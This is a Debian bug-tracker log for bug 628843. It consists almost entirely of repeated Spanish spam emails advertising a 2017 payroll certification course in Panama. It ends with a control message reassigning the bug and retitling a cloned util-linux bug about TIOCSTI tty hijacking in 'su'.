										5.1. Contratos Definidos. 

										5.2. Contratos Indefinidos. 

										5.3. Contratos Por Obra. 

										6. Formas De Contrato De Trabajo. 

										6.1. Período Probatorio. 

										6.2. La Movilidad, Elementos Esenciales. 

										7. Contratistas y Sub-Contratistas. 

										8. ¿Cuándo Se Requiere La Aprobación oficial de un contrato de trabajo? 

										9. Causas De Terminación de la relación laboral

										10. Relación De Trabajo Vs Servicio Profesional. 

										11. Derechos Y Obligaciones De Los trabajadores y empleadores. 

										12. Las Sanciones Disciplinarias. 

										13. Aplicación Para Terminar La Relación Laboral. 

										13.1. Los Despidos. 

										13.1.1. Injustificados. 

										13.1.2. Justificados. 

										13.1.2.1. Causas Justas De Despido. 

										13.1.2.1.1. Disciplinarias. 

										13.1.2.1.2. No Imputables. 

										13.1.2.1.3. Económicas. 

										13.2. Indemnización Y Reintegros. 

										13.3. Cómo Redactar Una Carta De Despido. 

										13.4. Estructura De La Notificación De Despido. 

										14. Las Renuncias. 

										14.1. Cómo Redactar Las Cartas De renuncia. 

										15. El Mutuo Acuerdo.
										
										 
										MODULO 2: PLANILLA 100% PRÁCTICO
										Fecha: 28-07-2017 
Horario: 8:30 am a 1:30 pm
										
Requisitos: Llevar computador el día del Evento 
										 
										1.Calculo del salario  
										a.Por hora 
										b.Semanal 
										c.Bisemanal 
										d.Quincenal 
										e.Mensual
										2.Descuentos y Retenciones permitidas sobre el salario.
										3.Pago de Incapacidades 
										4.Descuento de Ausencias y Permisos.
										5.Calculo de Horas Extras
										6.Liquidaciones Laborales 
										a.Tipos de despido 
										b.Tipos de renuncia 
										c.Calculo de vacaciones 
										d.Cálculo del XIII mes 
										e.Prima de antigüedad 
										f.Preaviso 
										i.De la empresa hacia el empleado 
										ii.Del empleado hacia la empresa 
										g.Indemnización
										 
										MODULO 3: SIPE EN LíNEA - LA PLANILLA CáLCULO DE HORAS EXTRAS LIQUIDACIONES 
										Fecha: 29-07-2017
Horario: 8:30 am a 1:30 pm 
										
Objetivo General:
										 
										1. Proveer al participante la información completa y el marco legal que sostienen los procedimientos y procesos de este sistema. 
										 
										2. Convertir al usuario en un experto en el uso del sistema, evitando así las inconsistencias, multas, cargos por ajustes de salarios mal posteados, recargos e intereses.
										
Contenido:
										 
										1. Sistema de Ingresos y Prestaciones Económicas “SIPE”
										• Qué es el SIPE?
										• La firma Digital.
										• Creación de usuarios y bloqueo de los mismos
										• Grupo de empleados
										• El Aviso de Entrada
										• Licencias
										• Reportes del sistema
										• La afiliación Vs el aviso de entrada
										• Retiro de empleados• Reflejar la liquidación al momento del retiro de los empleados
										• Qué es el salario ajustado
										 
										2. CONCEPTO DE SALARIO PARA SIPE
										Qué se considera salario para la Caja de Seguro Social.
										
3. Régimen tributario de la Caja de Seguro Social
										• Cuotas de empleados.
										• Cuotas de empleadores.
										• Contribución de las pensiones y jubilaciones.
										• Calculo oficial del Aviso de cobro o comprobante de ingresos
										
4. Problemas que generados en el sistema que usted puede resolver.
										 
										5. Problemas generados en el sistema que son resueltos por la CSS.
										 
										6. Planillas domésticas.
										 
										7. Montaremos una planilla en tiempo real, durante la capacitación
										 
										8. Preguntas y respuestas
										 
										9. Manejo de la información importante LEY 51 de la CSS
									
									
									
								 
								
					
		Facilitadores
								Especialista. Rose Molina 
											Ingeniera Industrial Administrativa con Licenciatura en Profesorado de Segunda Enseñanza, IV año de Contabilidad y Diplomado en Gestión Tributaria, gerencia general y administrativa, contabilidad general, dirección de personal, entrenamiento de personal en temas dirigidos, dirección y planificación de obras y proyectos, mantenimiento de flotas, logística de transporte y movimiento de carga suelta y contener izada puerta a puerta. Administración de talleres de servicio.
											 
											Abog. Armando Avendaño 
											Abogado de La Universidad católica Santa Maria La Antigua, Postgrado en Derecho laboral, Abogado en gestión de procesos penales, asesorías laborales, trámites comerciales, administrativos.
											 
											
								
					
		Evento en Panamá
					Fecha:  viernes 21 de julio de 2017 y sábado 29 de julio de 2017 
					Lugar: Hotel El Panamá , Ciudad de Panamá
						
					24 horas académicas 
					
		 
					Precios en Panamá (NO INCLUYEN I.T.B.M.)
								Preventa I
												B/ Ver Precio
												Válido hasta el 06 de Julio
											
								 
								Preventa II
												B/ Ver Precio
												Válido desde el 07 de Julio hasta el 13 de Julio
											
								 
								Normal
												B/ Ver Precio
												Válido desde el 14 de Julio hasta el 20 de Julio
											
								 
								Día del Evento
												B/ Ver Precio
												Válido desde el 21 de Julio hasta el 21 de Julio
											
								 
								Carta de Compromiso
												B/ Ver Precio
												Para empresas que cancelen después del evento. Promociones NO APLICAN.
											
								 
								
					
		 
											Promociones
											 
											PAGUE 2 Y LLEVE 3
																	PAGUE 4 Y LLEVE 6
																	PAGUE 6 Y LLEVE 10
																	PAGUE 12 Y LLEVE 20
																	25% DE DESCUENTO PARA ESTUDIANTES (Válido al enviar Carnet Vigente)
																	
														
											 
												
											 
											El curso incluye
														 
														Material de Apoyo
																Tarjeta de Membresía
																Coffee Break
																Certificado
																Hologram Sticker 3D (Validación de Certificado)
															
														
											 
											
								
					
		 
					 
												
											Pague Online
											Realice su pago de forma online, con su tarjeta de credito VISA o MASTERCARD
											
								 
									
								 
												
											Incompany
											Lleve este Taller a Su Empresa (Modalidad INCOMPANY)
											
								
					 
					
		Reserve sus cupos en el evento en Panamá GERENCIALES.COM
					
		 
					Contacto
								Teléfonos:

									507- 3985084 sino logra ser atendido puede llamar también al 507-8335786
									
								 
									
								Le hemos enviado este correo a usted, que forma parte de una élite de profesionales exitosos y emprendedores en búsqueda de Adiestramiento y Capacitación en diversas áreas empresariales, de vital importancia para el desenvolvimiento de las diferentes labores organizacionales de hoy en día. Si usted considera que esta información no es de su interés, haga clic aquí para Desuscribirse.
								
					
		 
					 
											Soluciones Gerenciales (Grupo Soluciones Gerenciales S.A, RUC: 1281637-1-600678). Marcar como SPAM.
															
														 
															
														 
																		 
																		 
																		 
																		 
																	
														
											 
											
								
					
		

[Message part 2 (text/html, inline)]

---

Message #288 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Boletin
 
									 
								Soluciones Gerenciales le Invita a nuestra Certificación: Especialista en Planilla
									 
												
											Teléfonos:507- 3985092 sino logra ser atendido puede llamar también al 507-8335786
											Marcar como SPAM
											 
											 
															 
															Próximos Eventos
															 
														
											 
											 
															 
															Talleres Incompany
															 
														
											 
											
								 
									 
								
					
		 
		 
					 
															
															Reservar en Panamá (Presencial)
															 
														
											 
											Certificación:
											 
											Especialista en Planilla
											 
											 
												
											 
											 
														Obtén la herramientas necesarias para ser un especialista en planilla
														 
														
											 
											
								
					
		 
		Contenido del Evento
								
									
									MODULO 1: INTENSIVO PARA PLANILLEROS
										Fecha: 21-07-2017 y 22-07-2017
Horario: 16 horas academicas (1:30 pm a 6:30 pm)
										Rose Molina
										
										Contenido:

										1. Concepto de salario para Mitradel, CSS 

										2. Normas protectoras de Salario según el Código de trabajo

										3. Régimen de seguridad social

										4. El Contrato de Trabajo.

										5. Salario Mínimo.

										6. Descuentos y Retenciones permitidas sobre el salario.

										7. Incapacidades, Ausencias y Permisos.

										8. Calculo de Horas Extras

										9. Liquidaciones Laborales

										10. Introducción a SIPE

										 

										Armando Avendaño

										Aplicación Correcta del código de Trabajo

										Contenido:

										1. La Relación De Trabajo. 

										2. Los Sujetos De La Relación De Trabajo. 

										3. El Contrato De Trabajo. 

										3.1. Características Principales. 

										-dependencia Económica. 

										-subordinación Jurídica. 

										4. Por qué debemos celebrar un contrato de trabajo. 

										5. Tipos De Contratos. 

										5.1. Contratos Definidos. 

										5.2. Contratos Indefinidos. 

										5.3. Contratos Por Obra. 

										6. Formas De Contrato De Trabajo. 

										6.1. Período Probatorio. 

										6.2. La Movilidad, Elementos Esenciales. 

										7. Contratistas y Sub-Contratistas. 

										8. ¿Cuándo Se Requiere La Aprobación oficial de un contrato de trabajo? 

										9. Causas De Terminación de la relación laboral

										10. Relación De Trabajo Vs Servicio Profesional. 

										11. Derechos Y Obligaciones De Los trabajadores y empleadores. 

										12. Las Sanciones Disciplinarias. 

										13. Aplicación Para Terminar La Relación Laboral. 

										13.1. Los Despidos. 

										13.1.1. Injustificados. 

										13.1.2. Justificados. 

										13.1.2.1. Causas Justas De Despido. 

										13.1.2.1.1. Disciplinarias. 

										13.1.2.1.2. No Imputables. 

										13.1.2.1.3. Económicas. 

										13.2. Indemnización Y Reintegros. 

										13.3. Cómo Redactar Una Carta De Despido. 

										13.4. Estructura De La Notificación De Despido. 

										14. Las Renuncias. 

										14.1. Cómo Redactar Las Cartas De renuncia. 

										15. El Mutuo Acuerdo.
										
										 
										MODULO 2: PLANILLA 100% PRÁCTICO
										Fecha: 28-07-2017 
Horario: 8:30 am a 1:30 pm
										
Requisitos: Llevar computador el día del Evento 
										 
										1.Calculo del salario  
										a.Por hora 
										b.Semanal 
										c.Bisemanal 
										d.Quincenal 
										e.Mensual
										2.Descuentos y Retenciones permitidas sobre el salario.
										3.Pago de Incapacidades 
										4.Descuento de Ausencias y Permisos.
										5.Calculo de Horas Extras
										6.Liquidaciones Laborales 
										a.Tipos de despido 
										b.Tipos de renuncia 
										c.Calculo de vacaciones 
										d.Cálculo del XIII mes 
										e.Prima de antigüedad 
										f.Preaviso 
										i.De la empresa hacia el empleado 
										ii.Del empleado hacia la empresa 
										g.Indemnización
										 
										MODULO 3: SIPE EN LíNEA - LA PLANILLA CáLCULO DE HORAS EXTRAS LIQUIDACIONES 
										Fecha: 29-07-2017
Horario: 8:30 am a 1:30 pm 
										
Objetivo General:
										 
										1. Proveer al participante la información completa y el marco legal que sostienen los procedimientos y procesos de este sistema. 
										 
										2. Convertir al usuario en un experto en el uso del sistema, evitando así las inconsistencias, multas, cargos por ajustes de salarios mal posteados, recargos e intereses.
										
Contenido:
										 
										1. Sistema de Ingresos y Prestaciones Económicas “SIPE”
										• Qué es el SIPE?
										• La firma Digital.
										• Creación de usuarios y bloqueo de los mismos
										• Grupo de empleados
										• El Aviso de Entrada
										• Licencias
										• Reportes del sistema
										• La afiliación Vs el aviso de entrada
										• Retiro de empleados• Reflejar la liquidación al momento del retiro de los empleados
										• Qué es el salario ajustado
										 
										2. CONCEPTO DE SALARIO PARA SIPE
										Qué se considera salario para la Caja de Seguro Social.
										
3. Régimen tributario de la Caja de Seguro Social
										• Cuotas de empleados.
										• Cuotas de empleadores.
										• Contribución de las pensiones y jubilaciones.
										• Calculo oficial del Aviso de cobro o comprobante de ingresos
										
4. Problemas que generados en el sistema que usted puede resolver.
										 
										5. Problemas generados en el sistema que son resueltos por la CSS.
										 
										6. Planillas domésticas.
										 
										7. Montaremos una planilla en tiempo real, durante la capacitación
										 
										8. Preguntas y respuestas
										 
										9. Manejo de la información importante LEY 51 de la CSS
									
									
									
								 
								
					
		Facilitadores
								Especialista. Rose Molina 
											Ingeniera Industrial Administrativa con Licenciatura en Profesorado de Segunda Enseñanza, IV año de Contabilidad y Diplomado en Gestión Tributaria, gerencia general y administrativa, contabilidad general, dirección de personal, entrenamiento de personal en temas dirigidos, dirección y planificación de obras y proyectos, mantenimiento de flotas, logística de transporte y movimiento de carga suelta y contener izada puerta a puerta. Administración de talleres de servicio.
											 
											Abog. Armando Avendaño 
											Abogado de La Universidad católica Santa Maria La Antigua, Postgrado en Derecho laboral, Abogado en gestión de procesos penales, asesorías laborales, trámites comerciales, administrativos.
											 
											
								
					
		Evento en Panamá
					Fecha:  viernes 21 de julio de 2017 y sábado 29 de julio de 2017 
					Lugar: Hotel El Panamá , Ciudad de Panamá
						
					24 horas académicas 
					
		 
					Precios en Panamá (NO INCLUYEN I.T.B.M.)
								Preventa I
												B/ Ver Precio
												Válido hasta el 06 de Julio
											
								 
								Preventa II
												B/ Ver Precio
												Válido desde el 07 de Julio hasta el 13 de Julio
											
								 
								Normal
												B/ Ver Precio
												Válido desde el 14 de Julio hasta el 20 de Julio
											
								 
								Día del Evento
												B/ Ver Precio
												Válido desde el 21 de Julio hasta el 21 de Julio
											
								 
								Carta de Compromiso
												B/ Ver Precio
												Para empresas que cancelen después del evento. Promociones NO APLICAN.
											
								 
								
					
		 
											Promociones
											 
											PAGUE 2 Y LLEVE 3
																	PAGUE 4 Y LLEVE 6
																	PAGUE 6 Y LLEVE 10
																	PAGUE 12 Y LLEVE 20
																	25% DE DESCUENTO PARA ESTUDIANTES (Válido al enviar Carnet Vigente)
																	
														
											 
												
											 
											El curso incluye
														 
														Material de Apoyo
																Tarjeta de Membresía
																Coffee Break
																Certificado
																Hologram Sticker 3D (Validación de Certificado)
															
														
											 
											
								
					
		 
					 
												
											Pague Online
											Realice su pago de forma online, con su tarjeta de credito VISA o MASTERCARD
											
								 
									
								 
												
											Incompany
											Lleve este Taller a Su Empresa (Modalidad INCOMPANY)
											
								
					 
					
		Reserve sus cupos en el evento en Panamá GERENCIALES.COM
					
		 
					Contacto
								Teléfonos:

									507- 3985084 sino logra ser atendido puede llamar también al 507-8335786
									
								 
									
								Le hemos enviado este correo a usted, que forma parte de una élite de profesionales exitosos y emprendedores en búsqueda de Adiestramiento y Capacitación en diversas áreas empresariales, de vital importancia para el desenvolvimiento de las diferentes labores organizacionales de hoy en día. Si usted considera que esta información no es de su interés, haga clic aquí para Desuscribirse.
								
					
		 
					 
											Soluciones Gerenciales (Grupo Soluciones Gerenciales S.A, RUC: 1281637-1-600678). Marcar como SPAM.
															
														 
															
														 
																		 
																		 
																		 
																		 
																	
														
											 
											
								
					
		

[Message part 2 (text/html, inline)]

---

Message #293 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

Boletin
 
									 
								Soluciones Gerenciales le Invita a nuestra Certificación: Especialista en Planilla
									 
												
											Teléfonos:507- 3985092 sino logra ser atendido puede llamar también al 507-8335786
											Marcar como SPAM
											 
											 
															 
															Próximos Eventos
															 
														
											 
											 
															 
															Talleres Incompany
															 
														
											 
											
								 
									 
								
					
		 
		 
					 
															
															Reservar en Panamá (Presencial)
															 
														
											 
											Certificación:
											 
											Especialista en Planilla
											 
											 
												
											 
											 
														Obtén la herramientas necesarias para ser un especialista en planilla
														 
														
											 
											
								
					
		 
		Contenido del Evento
								
									
									MODULO 1: INTENSIVO PARA PLANILLEROS
										Fecha: 21-07-2017 y 22-07-2017
Horario: 16 horas academicas (1:30 pm a 6:30 pm)
										Rose Molina
										
										Contenido:

										1. Concepto de salario para Mitradel, CSS 

										2. Normas protectoras de Salario según el Código de trabajo

										3. Régimen de seguridad social

										4. El Contrato de Trabajo.

										5. Salario Mínimo.

										6. Descuentos y Retenciones permitidas sobre el salario.

										7. Incapacidades, Ausencias y Permisos.

										8. Calculo de Horas Extras

										9. Liquidaciones Laborales

										10. Introducción a SIPE

										 

										Armando Avendaño

										Aplicación Correcta del código de Trabajo

										Contenido:

										1. La Relación De Trabajo. 

										2. Los Sujetos De La Relación De Trabajo. 

										3. El Contrato De Trabajo. 

										3.1. Características Principales. 

										-dependencia Económica. 

										-subordinación Jurídica. 

										4. Por qué debemos celebrar un contrato de trabajo. 

										5. Tipos De Contratos. 

										5.1. Contratos Definidos. 

										5.2. Contratos Indefinidos. 

										5.3. Contratos Por Obra. 

										6. Formas De Contrato De Trabajo. 

										6.1. Período Probatorio. 

										6.2. La Movilidad, Elementos Esenciales. 

										7. Contratistas y Sub-Contratistas. 

										8. ¿Cuándo Se Requiere La Aprobación oficial de un contrato de trabajo? 

										9. Causas De Terminación de la relación laboral

										10. Relación De Trabajo Vs Servicio Profesional. 

										11. Derechos Y Obligaciones De Los trabajadores y empleadores. 

										12. Las Sanciones Disciplinarias. 

										13. Aplicación Para Terminar La Relación Laboral. 

										13.1. Los Despidos. 

										13.1.1. Injustificados. 

										13.1.2. Justificados. 

										13.1.2.1. Causas Justas De Despido. 

										13.1.2.1.1. Disciplinarias. 

										13.1.2.1.2. No Imputables. 

										13.1.2.1.3. Económicas. 

										13.2. Indemnización Y Reintegros. 

										13.3. Cómo Redactar Una Carta De Despido. 

										13.4. Estructura De La Notificación De Despido. 

										14. Las Renuncias. 

										14.1. Cómo Redactar Las Cartas De renuncia. 

										15. El Mutuo Acuerdo.
										
										 
										MODULO 2: PLANILLA 100% PRÁCTICO
										Fecha: 28-07-2017 
Horario: 8:30 am a 1:30 pm
										
Requisitos: Llevar computador el día del Evento 
										 
										1.Calculo del salario  
										a.Por hora 
										b.Semanal 
										c.Bisemanal 
										d.Quincenal 
										e.Mensual
										2.Descuentos y Retenciones permitidas sobre el salario.
										3.Pago de Incapacidades 
										4.Descuento de Ausencias y Permisos.
										5.Calculo de Horas Extras
										6.Liquidaciones Laborales 
										a.Tipos de despido 
										b.Tipos de renuncia 
										c.Calculo de vacaciones 
										d.Cálculo del XIII mes 
										e.Prima de antigüedad 
										f.Preaviso 
										i.De la empresa hacia el empleado 
										ii.Del empleado hacia la empresa 
										g.Indemnización
										 
										MODULO 3: SIPE EN LíNEA - LA PLANILLA CáLCULO DE HORAS EXTRAS LIQUIDACIONES 
										Fecha: 29-07-2017
Horario: 8:30 am a 1:30 pm 
										
Objetivo General:
										 
										1. Proveer al participante la información completa y el marco legal que sostienen los procedimientos y procesos de este sistema. 
										 
										2. Convertir al usuario en un experto en el uso del sistema, evitando así las inconsistencias, multas, cargos por ajustes de salarios mal posteados, recargos e intereses.
										
Contenido:
										 
										1. Sistema de Ingresos y Prestaciones Económicas “SIPE”
										• Qué es el SIPE?
										• La firma Digital.
										• Creación de usuarios y bloqueo de los mismos
										• Grupo de empleados
										• El Aviso de Entrada
										• Licencias
										• Reportes del sistema
										• La afiliación Vs el aviso de entrada
										• Retiro de empleados• Reflejar la liquidación al momento del retiro de los empleados
										• Qué es el salario ajustado
										 
										2. CONCEPTO DE SALARIO PARA SIPE
										Qué se considera salario para la Caja de Seguro Social.
										
3. Régimen tributario de la Caja de Seguro Social
										• Cuotas de empleados.
										• Cuotas de empleadores.
										• Contribución de las pensiones y jubilaciones.
										• Calculo oficial del Aviso de cobro o comprobante de ingresos
										
4. Problemas que generados en el sistema que usted puede resolver.
										 
										5. Problemas generados en el sistema que son resueltos por la CSS.
										 
										6. Planillas domésticas.
										 
										7. Montaremos una planilla en tiempo real, durante la capacitación
										 
										8. Preguntas y respuestas
										 
										9. Manejo de la información importante LEY 51 de la CSS
									
									
									
								 
								
					
		Facilitadores
								Especialista. Rose Molina 
											Ingeniera Industrial Administrativa con Licenciatura en Profesorado de Segunda Enseñanza, IV año de Contabilidad y Diplomado en Gestión Tributaria, gerencia general y administrativa, contabilidad general, dirección de personal, entrenamiento de personal en temas dirigidos, dirección y planificación de obras y proyectos, mantenimiento de flotas, logística de transporte y movimiento de carga suelta y contener izada puerta a puerta. Administración de talleres de servicio.
											 
											Abog. Armando Avendaño 
											Abogado de La Universidad católica Santa Maria La Antigua, Postgrado en Derecho laboral, Abogado en gestión de procesos penales, asesorías laborales, trámites comerciales, administrativos.
											 
											
								
					
		Evento en Panamá
					Fecha:  viernes 21 de julio de 2017 y sábado 29 de julio de 2017 
					Lugar: Hotel El Panamá , Ciudad de Panamá
						
					24 horas académicas 
					
		 
					Precios en Panamá (NO INCLUYEN I.T.B.M.)
								Preventa I
												B/ Ver Precio
												Válido hasta el 06 de Julio
											
								 
								Preventa II
												B/ Ver Precio
												Válido desde el 07 de Julio hasta el 13 de Julio
											
								 
								Normal
												B/ Ver Precio
												Válido desde el 14 de Julio hasta el 20 de Julio
											
								 
								Día del Evento
												B/ Ver Precio
												Válido desde el 21 de Julio hasta el 21 de Julio
											
								 
								Carta de Compromiso
												B/ Ver Precio
												Para empresas que cancelen después del evento. Promociones NO APLICAN.
											
								 
								
					
		 
											Promociones
											 
											PAGUE 2 Y LLEVE 3
																	PAGUE 4 Y LLEVE 6
																	PAGUE 6 Y LLEVE 10
																	PAGUE 12 Y LLEVE 20
																	25% DE DESCUENTO PARA ESTUDIANTES (Válido al enviar Carnet Vigente)
																	
														
											 
												
											 
											El curso incluye
														 
														Material de Apoyo
																Tarjeta de Membresía
																Coffee Break
																Certificado
																Hologram Sticker 3D (Validación de Certificado)
															
														
											 
											
								
					
		 
					 
												
											Pague Online
											Realice su pago de forma online, con su tarjeta de credito VISA o MASTERCARD
											
								 
									
								 
												
											Incompany
											Lleve este Taller a Su Empresa (Modalidad INCOMPANY)
											
								
					 
					
		Reserve sus cupos en el evento en Panamá GERENCIALES.COM
					
		 
					Contacto
								Teléfonos:

									507- 3985084 sino logra ser atendido puede llamar también al 507-8335786
									
								 
									
								Le hemos enviado este correo a usted, que forma parte de una élite de profesionales exitosos y emprendedores en búsqueda de Adiestramiento y Capacitación en diversas áreas empresariales, de vital importancia para el desenvolvimiento de las diferentes labores organizacionales de hoy en día. Si usted considera que esta información no es de su interés, haga clic aquí para Desuscribirse.
								
					
		 
					 
											Soluciones Gerenciales (Grupo Soluciones Gerenciales S.A, RUC: 1281637-1-600678). Marcar como SPAM.
															
														 
															
														 
																		 
																		 
																		 
																		 
																	
														
											 
											
								
					
		

[Message part 2 (text/html, inline)]

---

Message #298 received at 628843@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

		
		
		
			Si no ve este corr= eo, haga [click aqui](3D'http://seg.publicidadpersonal.com/public/correo_detalle=) 			No quiero recibir mas este correo (Unsubscribe)= --> 		 			Co= mpartir este correo  			 [](3D'http://seg.publicidadpersonal.com/public/correo_detalle.=) 		 		 		 		 		

		
		


hola
		

		 		
			[](3D'http://www.tuloenvias.com.ve/') Este correo fue enviado por Soluciones Geren= ciales (j312255749) a traves de TuLoEnvias.com= ong> 		 		
			 		Su correo se encuentra registrado en la base de datos de Soluciones G= erenciales, si usted no desea seguir recibiendo este correo, por favor haga= click en retirar de la lista y no recibira mas correos de esta empr= esa, o actualice su informacion para mejorar nuestra segmentaci&oacu= te;n y envio de correos.
		[Actualizar mi informacion](3D'http://seg.publicidadpersonal.com/public/proceso_redirect.=) | [Retirar de la lista (Unsubscribe)](3D'ht=) 		 		 		
		

[Message part 2 (text/html, inline)]

---

Message #307 received at 628843-quiet@bugs.debian.org (full text, mbox, reply):

Control: reassign 628843 src:shadow
Control: found 628843 1:4.1.4.2+svn3283-1
Control: found 628843 1:4.2-3+deb8u1
Control: notfound 628843 1:4.5-1.1
Control: clone 628843 -2 util-linux
Control: found -2 2.32-0.4
Control: notfound -2 2.32-0.3
Control: retitle -2 util-linux: tty hijacking possible in "su" via TIOCSTI ioctl

Reassigning this back to src:shadow, as it's used as the security
tracking bug. I was going to close this "su" from src:util-linux,
but turns out this is not fixed there either.

---

Send a report that this bug log contains spam.

---

Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:34:03 2019; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.